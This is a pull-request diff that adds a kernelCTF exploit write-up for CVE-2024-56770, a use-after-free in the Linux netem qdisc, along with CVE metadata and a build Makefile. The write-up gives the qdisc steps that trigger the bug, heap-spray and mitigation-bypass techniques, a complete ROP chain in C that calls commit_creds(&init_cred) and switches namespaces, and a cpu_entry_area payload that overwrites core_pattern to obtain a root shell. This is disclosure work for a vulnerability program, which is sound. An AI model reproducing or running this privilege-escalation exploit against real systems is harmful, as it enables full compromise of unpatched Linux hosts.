Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
355 changes: 355 additions & 0 deletions pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,355 @@
# Overview

In general, 'qlen' of any classful qdisc should keep track of the number of packets that the qdisc itself and all of its children holds. In case of netem, 'qlen' only accounts for the packets in its internal tfifo. When netem is used with a child qdisc [1], the child qdisc can use 'qdisc_tree_reduce_backlog' to inform its parent, netem, about created or dropped SKBs. This function updates 'qlen' and the backlog statistics of netem, but netem does not account for changes made by a child qdisc. 'qlen' then indicates the wrong number of packets in the tfifo. If a child qdisc creates new SKBs during enqueue and informs its parent about this, netem's 'qlen' value is increased. When netem dequeues the newly created SKBs from the child, the 'qlen' in netem is not updated.

```c
static struct sk_buff *netem_dequeue(struct Qdisc *sch)
{
struct netem_sched_data *q = qdisc_priv(sch);
struct sk_buff *skb;

tfifo_dequeue:
skb = __qdisc_dequeue_head(&sch->q);
if (skb) {
qdisc_qstats_backlog_dec(sch, skb);
deliver:
qdisc_bstats_update(sch, skb);
return skb;
}
skb = netem_peek(q);
if (skb) {
u64 time_to_send;
u64 now = ktime_get_ns();

/* if more time remaining? */
time_to_send = netem_skb_cb(skb)->time_to_send;
if (q->slot.slot_next && q->slot.slot_next < time_to_send)
get_slot_next(q, now);

if (time_to_send <= now && q->slot.slot_next <= now) {
netem_erase_head(q, skb);
sch->q.qlen--;
qdisc_qstats_backlog_dec(sch, skb);
skb->next = NULL;
skb->prev = NULL;
/* skb->dev shares skb->rbnode area,
* we need to restore its value.
*/
skb->dev = qdisc_dev(sch);

if (q->slot.slot_next) {
q->slot.packets_left--;
q->slot.bytes_left -= qdisc_pkt_len(skb);
if (q->slot.packets_left <= 0 ||
q->slot.bytes_left <= 0)
get_slot_next(q, now);
}

if (q->qdisc) {
unsigned int pkt_len = qdisc_pkt_len(skb);
struct sk_buff *to_free = NULL;
int err;

err = qdisc_enqueue(skb, q->qdisc, &to_free); // [1]
kfree_skb_list(to_free);
if (err != NET_XMIT_SUCCESS &&
net_xmit_drop_count(err)) {
qdisc_qstats_drop(sch);
qdisc_tree_reduce_backlog(sch, 1,
pkt_len);
}
goto tfifo_dequeue;
}
goto deliver;
}

if (q->qdisc) {
skb = q->qdisc->ops->dequeue(q->qdisc);
if (skb)
goto deliver;
}

qdisc_watchdog_schedule_ns(&q->watchdog,
max(time_to_send,
q->slot.slot_next));
}

if (q->qdisc) {
skb = q->qdisc->ops->dequeue(q->qdisc);
if (skb)
goto deliver;
}
return NULL;
}
```

We can trigger the UAF as follows.

- Create a Qdisc DRR `1:`
- Create a Class DRR `1:1`

- Create a Qdisc DRR `2:` as a child of `1:1`
- Create a Class DRR `2:1`
- Create a Class DRR `2:2`

- Create a Qdisc NetEM `3:` as a child of `2:1`

- Create a Qdisc TBF `4:` as a child of `3:`

- Create a Qdisc NetEM `5:` as a child of `2:2`

- Send a packet to `2:1`
- Send a packet to `2:1`

- Delete the Class DRR `2:1`

- Send a packet to `2:2`

- Delete the Class DRR `1:1`

- Send a packet to trigger the UAF

# KASLR Bypass

We used a timing side channel attack to leak the kernel base.

# RIP Control

RIP is controlled in `drr_dequeue()`.

```c
static struct sk_buff *drr_dequeue(struct Qdisc *sch)
{
struct drr_sched *q = qdisc_priv(sch);
struct drr_class *cl;
struct sk_buff *skb;
unsigned int len;

if (list_empty(&q->active))
goto out;
while (1) {
cl = list_first_entry(&q->active, struct drr_class, alist);
skb = cl->qdisc->ops->peek(cl->qdisc); // [2]
if (skb == NULL) {
qdisc_warn_nonwc(__func__, cl->qdisc);
goto out;
}
```

When the DRR Qdisc class is deleted, both `cl` and `cl->qdisc` are freed. At this point, with both freed, `cl` is left in its freed state and a fake qdisc is sprayed onto `cl->qdisc`. This allows control over the RIP when `cl->qdisc->ops->peek` is called [2]. Setting the fake qdisc's ops to `drr_qdisc_ops` causes the `peek` function below to be invoked.

```c
static inline struct sk_buff *qdisc_peek_dequeued(struct Qdisc *sch)
{
struct sk_buff *skb = skb_peek(&sch->gso_skb);

/* we can reuse ->gso_skb because peek isn't called for root qdiscs */
if (!skb) {
skb = sch->dequeue(sch); // [3]

if (skb) {
__skb_queue_head(&sch->gso_skb, skb);
/* it's still part of the queue */
qdisc_qstats_backlog_inc(sch, skb);
sch->q.qlen++;
}
}

return skb;
}
```

In `qdisc_peek_dequeued()`, if `sch->gso_skb` is `0`, `sch->dequeue` is called [3]. Since `sch->dequeue` corresponds to the 0x8 offset in `struct Qdisc`, a stack pivot gadget can be stored at this location to perform ROP.

We allocate the `user_key_payload` and `ctl_buf` objects into `kmalloc-512` for the fake Qdisc spray.

For mitigation kernel, we use multiq Qdisc to bypass mitigations. We allocate the multiq Qdisc to `cl->qdisc`.

```c
static int multiq_init(struct Qdisc *sch, struct nlattr *opt,
struct netlink_ext_ack *extack)
{
struct multiq_sched_data *q = qdisc_priv(sch);
int i, err;

q->queues = NULL;

if (!opt)
return -EINVAL;

err = tcf_block_get(&q->block, &q->filter_list, sch, extack);
if (err)
return err;

q->max_bands = qdisc_dev(sch)->num_tx_queues;

q->queues = kcalloc(q->max_bands, sizeof(struct Qdisc *), GFP_KERNEL); // [4]
if (!q->queues)
return -ENOBUFS;
for (i = 0; i < q->max_bands; i++)
q->queues[i] = &noop_qdisc;

return multiq_tune(sch, opt, extack);
}
```

When initializing the multiq Qdisc, `q->queues` is allocated in `multiq_init()` [4]. At this point, the object size can be controlled to be `q->max_bands*sizeof(struct Qdisc *)`. Since `q->max_bands` is a user-controllable value, an object of any desired size can be allocated. To bypass mitigation, allocate an object larger than `0x2000`, which uses the page allocator. Then, delete the multiq Qdisc and allocate the `ctl_buf` objects into the freed `q->queues`.

```c
static struct sk_buff *multiq_peek(struct Qdisc *sch)
{
struct multiq_sched_data *q = qdisc_priv(sch);
unsigned int curband = q->curband;
struct Qdisc *qdisc;
struct sk_buff *skb;
int band;

for (band = 0; band < q->bands; band++) {
/* cycle through bands to ensure fairness */
curband++;
if (curband >= q->bands)
curband = 0;

/* Check that target subqueue is available before
* pulling an skb to avoid head-of-line blocking.
*/
if (!netif_xmit_stopped(
netdev_get_tx_queue(qdisc_dev(sch), curband))) {
qdisc = q->queues[curband];
skb = qdisc->ops->peek(qdisc); // [5]
if (skb)
return skb;
}
}
return NULL;

}
```

Next, when a packet is sent, `multiq_peek()` is called from `drr_dequeue()`. It then references `q->queues` and calls `qdisc->ops->peek()` [5]. Using `ctl_buf`, it overwrites `q->queues[]` with the address of the `cpu_entry_area`. As a result, `qdisc->ops` can also be set to an address within `cpu_entry_area`, and finally, the RIP can be controlled.

# Post-RIP

For COS kernel, the ROP payload is stored in `struct Qdisc` allocated in `kmalloc-512`. When `sch->dequeue()` is called, `RBP` points to the `struct Qdisc+0x80`.

```c
void rop_chain(uint64_t* data){
int i = 0;

data[i++] = 0; // enqueue
data[i++] = kbase + MOV_RSP_RBP_POP_RBP_RET; // dequeue

data[i++] = 0; // keylen
data[i++] = kbase + DRR_QDISC_OPS; // ops

i += 12;

data[i++] = 0; // gsoskb.next

// current = find_task_by_vpid(getpid())
data[i++] = kbase + POP_RDI_RET;
data[i++] = getpid();
data[i++] = kbase + FIND_TASK_BY_VPID;

// current += offsetof(struct task_struct, rcu_read_lock_nesting)
data[i++] = kbase + POP_RSI_RET;
data[i++] = RCU_READ_LOCK_NESTING_OFF;
data[i++] = kbase + ADD_RAX_RSI_RET;

// current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
data[i++] = kbase + POP_RCX_RET;
data[i++] = 0;
data[i++] = kbase + MOV_RAX_RCX_RET;

// Bypass "schedule while atomic": set oops_in_progress = 1
data[i++] = kbase + POP_RDI_RET;
data[i++] = 1;
data[i++] = kbase + POP_RSI_RET;
data[i++] = kbase + OOPS_IN_PROGRESS;
data[i++] = kbase + MOV_RSI_RDI_RET;

// commit_creds(&init_cred)
data[i++] = kbase + POP_RDI_RET;
data[i++] = kbase + INIT_CRED;
data[i++] = kbase + COMMIT_CREDS;

// find_task_by_vpid(1)
data[i++] = kbase + POP_RDI_RET;
data[i++] = 1;
data[i++] = kbase + FIND_TASK_BY_VPID;

// switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
data[i++] = kbase + MOV_RDI_RAX_RET;
data[i++] = kbase + POP_RSI_RET;
data[i++] = kbase + INIT_NSPROXY;
data[i++] = kbase + SWITCH_TASK_NAMESPACES;

data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE;
data[i++] = 0;
data[i++] = 0;
data[i++] = _user_rip;
data[i++] = _user_cs;
data[i++] = _user_rflags;
data[i++] = _user_sp;
data[i++] = _user_ss;
}
```

For the mitigation kernel, the payload is stored in the `cpu_entry_area` as follows.

```c
// Fill the CPU entry area exception stack of HELPER_CPU with a
// struct cpu_entry_area_payload
static void setup_cpu_entry_area() {
if (fork()) {
return;
}

struct cpu_entry_area_payload payload = {};

payload.regs[0] = kbase + QDISC_RESET; // multiq->ops->peek
payload.regs[1] = kbase + POP_POP_RET;
payload.regs[2] = kbase + PUSH_RBX_POP_RSP_RBP_RET; // multiq->ops->reset
payload.regs[3] = PAYLOAD_LOCATION(1) - PEEK_OFF ; // fake ops
payload.regs[4] = kbase + POP_RDI_POP_RSI_POP_RDX_POP_RET;
payload.regs[5] = kbase + CORE_PATTERN;
payload.regs[6] = MMAP_ADDR;
payload.regs[7] = strlen((char*)MMAP_ADDR);
payload.regs[8] = 0;
payload.regs[9] = kbase + COPY_FROM_USER;
payload.regs[10] = kbase + MSLEEP;

set_affinity(1);
signal(SIGFPE, sig_handler);
signal(SIGTRAP, sig_handler);
signal(SIGSEGV, sig_handler);
setsid();

while(1){
write_cpu_entry_area(&payload);
usleep(1000);
}
}
```

When RIP is controlled, `qdisc_reset()` is called first.

```c
void qdisc_reset(struct Qdisc *qdisc)
{
const struct Qdisc_ops *ops = qdisc->ops;

trace_qdisc_reset(qdisc);

if (ops->reset)
ops->reset(qdisc); // [6]

__skb_queue_purge(&qdisc->gso_skb);
__skb_queue_purge(&qdisc->skb_bad_txq);

qdisc->q.qlen = 0;
qdisc->qstats.backlog = 0;
}
```

In `qdisc_reset()`, `ops->reset()` is called with the address of the `cpu_entry_area` in the `RBX` register [6]. Therefore, ROP can be performed by modifying `ops->reset()` into a stack pivot gadget. The `core_pattern` overwrite technique is used to gain root shell access.
Original file line number Diff line number Diff line change
@@ -0,0 +1,13 @@
- Requirements:
- Capabilities: CAP_NET_ADMIN, CAP_NET_RAW
- Kernel configuration: CONFIG_NET_SCHED, CONFIG_NET_SCH_NETEM
- User namespaces required: Yes
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=50612537e9ab (netem: fix classful handling
)
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f8d4bc455047cf3903cd6f85f49978987dbb3027 (net/sched: netem: account for backlog updates from child qdisc)
- Affected Version: v3.3 - v6.13-rc2
- Affected Component: net/sched
- Cause: Use-After-Free
- Syscall to disable: disallow unprivileged username space
- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-56770
- Description: In the Linux kernel, the following vulnerability has been resolved: net/sched: netem: account for backlog updates from child qdisc In general, 'qlen' of any classful qdisc should keep track of the number of packets that the qdisc itself and all of its children holds. In case of netem, 'qlen' only accounts for the packets in its internal tfifo. When netem is used with a child qdisc, the child qdisc can use 'qdisc_tree_reduce_backlog' to inform its parent, netem, about created or dropped SKBs. This function updates 'qlen' and the backlog statistics of netem, but netem does not account for changes made by a child qdisc. 'qlen' then indicates the wrong number of packets in the tfifo. If a child qdisc creates new SKBs during enqueue and informs its parent about this, netem's 'qlen' value is increased. When netem dequeues the newly created SKBs from the child, the 'qlen' in netem is not updated. If 'qlen' reaches the configured sch->limit, the enqueue function stops working, even though the tfifo is not full. Reproduce the bug: Ensure that the sender machine has GSO enabled. Configure netem as root qdisc and tbf as its child on the outgoing interface of the machine as follows: $ tc qdisc add dev <oif> root handle 1: netem delay 100ms limit 100 $ tc qdisc add dev <oif> parent 1:0 tbf rate 50Mbit burst 1542 latency 50ms Send bulk TCP traffic out via this interface, e.g., by running an iPerf3 client on the machine. Check the qdisc statistics: $ tc -s qdisc show dev <oif> Statistics after 10s of iPerf3 TCP test before the fix (note that netem's backlog > limit, netem stopped accepting packets): qdisc netem 1: root refcnt 2 limit 1000 delay 100ms Sent 2767766 bytes 1848 pkt (dropped 652, overlimits 0 requeues 0) backlog 4294528236b 1155p requeues 0 qdisc tbf 10: parent 1:1 rate 50Mbit burst 1537b lat 50ms Sent 2767766 bytes 1848 pkt (dropped 327, overlimits 7601 requeues 0) backlog 0b 0p requeues 0 Statistics after the fix: qdisc netem 1: root refcnt 2 limit 1000 delay 100ms Sent 37766372 bytes 24974 pkt (dropped 9, overlimits 0 requeues 0) backlog 0b 0p requeues 0 qdisc tbf 10: parent 1:1 rate 50Mbit burst 1537b lat 50ms Sent 37766372 bytes 24974 pkt (dropped 327, overlimits 96017 requeues 0) backlog 0b 0p requeues 0 tbf segments the GSO SKBs (tbf_segment) and updates the netem's 'qlen'. The interface fully stops transferring packets and "locks". In this case, the child qdisc and tfifo are empty, but 'qlen' indicates the tfifo is at its limit and no more packets are accepted. This patch adds a counter for the entries in the tfifo. Netem's 'qlen' is only decreased when a packet is returned by its dequeue function, and not during enqueuing into the child qdisc. External updates to 'qlen' are thus accounted for and only the behavior of the backlog statistics changes. As in other qdiscs, 'qlen' then keeps track of how many packets are held in netem and all of its children. As before, sch->limit remains as the maximum number of packets in the tfifo. The same applies to netem's backlog statistics.
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
exploit:
gcc -o exploit ./exploit.c -lkeyutils -static

prerequisites:
sudo apt-get install libkeyutils-dev
Binary file not shown.
Loading
Loading